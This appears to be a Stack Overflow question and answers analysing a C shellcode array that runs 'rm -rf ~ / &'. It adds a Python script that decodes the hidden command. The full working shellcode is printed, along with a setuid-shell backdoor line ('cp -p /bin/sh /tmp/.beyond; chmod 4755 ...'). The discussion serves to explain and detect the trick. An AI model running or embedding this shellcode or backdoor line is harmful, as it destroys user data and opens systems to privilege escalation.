How does a hex command become rm -rf ~ / &?

2

How does the following malicious command become rm -rf ~ / & when compiled?

char esp[] __attribute__ ((section(".text"))) /* e.s.p release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";

Demi

Posted 2013-09-23T04:46:14.337

Reputation: 718

Just try to compile a small code like system("ls") and look into its assembly content. – Eddy_Em – 2013-09-23T04:53:17.467

I don't know assembly :( – Demi – 2013-09-23T05:00:35.760

Answers

2

It's called shellcode.

Basically the hex codes are determined from the assembled machine code and correspond to byte locations of Linux system calls.

Neil Neyman

Posted 2013-09-23T04:46:14.337

Reputation: 246

How does the code even compile without an error like "undefined reference to 'main'"? – Demi – 2013-09-23T05:03:12.647

@Demetri, that's quite simple: this variable is assembly code that's running when you run your compiled program. – Eddy_Em – 2013-09-23T05:05:18.307
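
Added example (not from the question or the answers): a small static decoder that shows where the command in the title hides inside the hex bytes. It assumes 32-bit x86 and only looks for back-to-back `push imm32` instructions (opcode 0x68) whose values are stored bitwise-inverted, which is how this array carries its string; the function names are made up for this example.

```python
# Hex bytes copied from the esp[] array in the question (trailing text literal left out).
SHELLCODE = bytes.fromhex(
    "eb3e5b31c050545a83ec6468"
    "ffffffff68dfd0dfd9688d99"
    "df81688d92dfd2545ef716f7"
    "5604f75608f7560c83c47456"
    "8d730856535459b00bcd8031"
    "c040ebf9e8bdffffff2f6269"
    "6e2f7368002d6300"
)
PUSH_IMM32 = 0x68  # x86 opcode: push imm32 (1 opcode byte + 4 immediate bytes)


def push_runs(code, min_len=2):
    """Return runs of back-to-back `push imm32` immediates as raw 4-byte values."""
    runs, i = [], 0
    while i < len(code):
        run = []
        while i + 5 <= len(code) and code[i] == PUSH_IMM32:
            run.append(code[i + 1:i + 5])
            i += 5
        if len(run) >= min_len:  # a lone 0x68 is usually data, e.g. the 'h' in "/bin/sh"
            runs.append(run)
        if not run:
            i += 1
    return runs


def is_text(data):
    """True for at least four bytes of printable ASCII."""
    return len(data) >= 4 and all(0x20 <= c < 0x7F for c in data)


def hidden_strings(code):
    """Lay each run out as it would sit in memory and try it plain and inverted."""
    found = []
    for run in push_runs(code):
        # The stack grows downwards, so the last value pushed comes first in memory.
        memory = b"".join(reversed(run))
        for label, data in (("plain", memory),
                            ("NOT", bytes(b ^ 0xFF for b in memory))):
            text = data.split(b"\x00", 1)[0]  # C string: stop at the first NUL
            if is_text(text):
                found.append((label, text.decode("ascii")))
    return found


if __name__ == "__main__":
    for label, text in hidden_strings(SHELLCODE):
        print(f"{label}: {text!r}")
```

The recovered string is what the code passes to `/bin/sh -c` (both of those strings sit in plain view at the end of the hex); the readable `cp -p ...` literal that follows is never referenced by the code.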